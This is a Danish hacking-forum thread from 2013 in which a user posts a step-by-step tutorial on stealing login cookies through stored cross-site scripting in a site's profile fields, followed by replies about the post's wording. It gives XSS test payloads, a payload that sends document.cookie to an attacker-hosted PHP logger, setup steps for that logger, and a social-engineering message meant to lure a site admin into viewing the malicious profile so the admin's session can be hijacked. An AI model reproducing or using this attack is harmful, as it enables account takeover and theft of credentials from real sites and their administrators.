Cookie-stealing med XSS på sider med login
|
04-12-2013, 11:04
(Denne besked var sidst ændret: 04-12-2013, 14:32 af Lycia.)
|
|||
|
|||
Cookie-stealing med XSS på sider med login
Hey ss! :D
I dag skal vi se lidt på at hacke lidt sites :D Jeg er ikke ansvarlig for den måde i bruge den læring jeg giver jer. Okay... Du skal bruge lidt viden inden for Cross site scripting også kaldet "XSS." Jeg kan opfordre jeg til at se den her tråd til at starte med: https://www.shellsec.pw/showthread.php?tid=264 Vi skal nemlig benytte os af cookie stealing. Hvad er cookie stealing? Cookie stealing bliver brugt til at stjæle login information fra enten et udvalgt mål, eller en masse forskellige. Det gør man ved hjælp af XSS (croos site scripting.) Det får så target til at sende en forspørgesel til en side (vores cookie stealer) for så at stjæle cookien, og derefter blive vider stillet til en 3 sidde, dette kan ske uden brugern opdager noget som helst. En cookiestealer køre over JavaScript, dvs. at stort set alle elektroniske apperater kan bruges, bare der har javascript. Test om den er vuln! Godt, det første vi gør er at oprette en bruger på vores target (altså vores site) Lad os sige gustav.com/user/registre/ Vi laver så en bruger hvor vi giver nogle random oplysnigner (mail osv.) Så skal vi så lidt igang. Nu går du så ind og ændre dit navn under "Edit Profile" til: Kode: <script>window.location="http://shellsec.pw/"</script> Kode: <script>alert("XSS")</script> Det kunne eks. være "Om dig (skriv en profil tekst)" Godt, kommer shellsec's side op når du går ind på din bruger (hvis du bruger det første xss script jeg gav) så er den vuln, brugte du det andet xss script ejg gav skulle der gerne komme en alert boks op hvor der står "XSS" Forberedelse til vores angreb Nu skal vi så have sat vores cookiestealer op. Det gør vi sådan her: 1 Gå til 000webhoste og opret en bruger. Derefter gå til "File Manager" Her trykker du så på "publich html" og sletter alt i mappen. 2 Nu åbner du et notepad dokoment og kopier følgende: Kode: <?php 3: Gå tilbage til 00webhoste og filemanager. Du trykker så på "uploade file" og uploader så "lycia.php" nu går du så til din hjemmeside: http://www.dinside.bla.bla.bla/lycia.php Nu skulle der så gerne være kommet en fil i File Manager der hedder "log.txt" Nu har vi sat vores cookie stealer op. Slet filen der hedder "log.txt" Udnyttelse Okay nu skal vi igang. Gå ind kopier urlen fra din bruger, og edit så dit profil navn til: Kode: <script>location.href = 'http://www.dinside.bla.bla.bla/lycia.php?cookie='+document.cookie;</script> Kode: Hej admin jeg synes en bruger har nogle underlige udtagleser i hans profiltekst hvor i han skriver at han ikke kan lide "navn på forumet" og at han bare vil spame. Det er ham her: "link til den første bruger du lavede..." Nu indsætter vi så admins cookie i vores egen (Søg evt på hvordan man gør, der er en masse guides hvor man bruger det efter man eks har stjålet cookies på et nal netværk. Lycia Out.
There is 3 rules for a life.
1. fuck. 2. Dont give a fuck. 3. Dont be fucked over |
|||
04-12-2013, 12:48
|
|||
|
|||
RE: Hack sider med username og forums mm.
Jeg tror måske du skal gøre opmærksom på at det her hedder cookie stealing, så man kan finde det hvis man søger efter det. Skriv det i titlen og uddyb eventuelt i teksten.
|
|||
04-12-2013, 13:00
|
|||
|
|||
RE: Hack sider med username og forums mm.
(04-12-2013, 11:04)Lycia Skrev: Vi skal nemlig benytte os af cookie stealing. Skal nok udtrykke det mere, men synes ikke det skal uddybes så meget mere, for det er jo ikke ligefrem fordi du sidder og skal bruger hjernen vildt til det her..
There is 3 rules for a life.
1. fuck. 2. Dont give a fuck. 3. Dont be fucked over |
|||
04-12-2013, 13:58
|
|||
|
|||
RE: Hack sider med username og forums mm.
(04-12-2013, 13:00)Lycia Skrev: Skal nok udtrykke det mere, men synes ikke det skal uddybes så meget mere, for det er jo ikke ligefrem fordi du sidder og skal bruger hjernen vildt til det her.. Nej, men der er jo mange der gerne vil vide hvad cookie-stealing er før de går i gang. Jeg mener bare meget kort, 2 linjer, skrive at det handler om at sætte et script ind, ved hjælp af XSS, der får brugeren til at sende en request til en anden side, med vedkommendes cookie som parameter så man kan fange den. |
|||
04-12-2013, 14:31
|
|||
|
|||
RE: Cookie-stealing med XSS på sider med login
(04-12-2013, 13:58)Doctor Blue Skrev: Nej, men der er jo mange der gerne vil vide hvad cookie-stealing er før de går i gang. Done :D
There is 3 rules for a life.
1. fuck. 2. Dont give a fuck. 3. Dont be fucked over |
|||
|
User(s) browsing this thread: